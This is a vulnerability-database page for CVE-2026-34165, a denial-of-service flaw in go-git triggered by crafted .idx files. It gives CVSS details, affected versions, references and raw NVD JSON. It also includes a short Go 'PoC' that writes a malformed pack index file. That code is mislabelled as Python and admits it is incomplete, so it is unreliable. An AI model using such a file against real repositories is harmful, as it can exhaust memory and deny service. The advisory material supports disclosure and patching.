CVE-2026-34165

Description

go-git is an extensible git implementation library written in pure Go. From version 5.0.0 to before version 5.17.1, a vulnerability has been identified in which a maliciously crafted .idx file can cause asymmetric memory consumption, potentially exhausting available memory and resulting in a denial-of-service (DoS) condition. Exploitation requires write access to the local repository's .git directory, it order to create or alter existing .idx files. This issue has been patched in version 5.17.1.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:go-git_project:go-git:*:*:*:*:*:go:*:* - VULNERABLE

go-git 5.0.0 <= version < 5.17.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

package main

import (
	"os"
	"encoding/binary"
)

func main() {
	// Create a malicious .idx file to trigger the vulnerability
	f, err := os.Create(".git/objects/pack/malicious.idx")
	if err != nil {
		return
	}
	defer f.Close()

	// Write standard .idx header
	f.Write([]byte{0xff, 0x74, 0x6f, 0x63, 0x02, 0x00, 0x00, 0x00})

	// Write fanout table with values that might trigger the asymmetric memory consumption
	// This is a simplified PoC demonstrating the file structure required
	for i := 0; i < 256; i++ {
		binary.Write(f, binary.BigEndian, uint32(0xFFFFFFFF))
	}

	// Additional malformed data would be placed here to maximize impact
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34165
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34165
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34165/
[4] VulDB https://vuldb.com/cve/CVE-2026-34165
[5] https://github.com/go-git/go-git/releases/tag/v5.17.1
[6] https://github.com/go-git/go-git/security/advisories/GHSA-jhf3-xxhw-2wpp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34165", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:17.343", "lastModified": "2026-04-02T16:49:16.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "go-git is an extensible git implementation library written in pure Go. From version 5.0.0 to before version 5.17.1, a vulnerability has been identified in which a maliciously crafted .idx file can cause asymmetric memory consumption, potentially exhausting available memory and resulting in a denial-of-service (DoS) condition. Exploitation requires write access to the local repository's .git directory, it order to create or alter existing .idx files. This issue has been patched in version 5.17.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:go-git_project:go-git:*:*:*:*:*:go:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.17.1", "matchCriteriaId": "E220E9FE-E976-448B-813E-87BD0E67C712"}]}]}], "references": [{"url": "https://github.com/go-git/go-git/releases/tag/v5.17.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/go-git/go-git/security/advisories/GHSA-jhf3-xxhw-2wpp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}